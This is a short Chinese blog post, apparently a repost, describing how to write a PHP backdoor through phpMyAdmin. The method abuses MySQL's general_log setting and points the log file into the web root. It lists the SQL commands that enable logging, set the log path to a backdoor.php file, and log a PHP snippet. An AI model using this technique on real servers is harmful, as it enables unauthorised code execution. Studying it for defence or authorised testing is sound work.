关注我们

突破phpMyAdmin不能导出shell的方法

LzersLzers 安全文摘 2018-04-10 325316 0

先启动phpStudy2017

突破phpMyAdmin不能导出shell的方法

general log 默认设置是 off 也就是不保存日志,而general log file 则是在保存日志情况下日志的路径,这里的话就利用这个服务器端保存日志来进行一些操作。

之前有一种场景,网站检查到恶意请求就直接显示请求者的本地信息,并给出警告,这里就是将请求的信息给保存在了数据库里,哈哈,只要思路猥琐,......

所以保守的情况下只要获取网站根目录就可以getshell,现在就开始在本地进行下实验。现在是未设置日志记录前本地的WWW目录下的文件列表。

突破phpMyAdmin不能导出shell的方法

现在再次查看文件列表,发现多了一个php文件。

突破phpMyAdmin不能导出shell的方法

突破phpMyAdmin不能导出shell的方法

深入&深入

当然如果没有上面如此"便捷"的环境与条件(肯定很难有o_O),
那么在安全测试过程中还是可以试一试的,比如下面这个方法。

找到到能执行sql查询的地方

set global general_log=on; //让general log开启
 
set global general_log_file='网站绝对路径/后门.php'; //生产后门文件
 
"<?php phpinfo(); ?>"   // **log会保存一切查询命令** ,利用可以猥琐一点


版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0评论已闭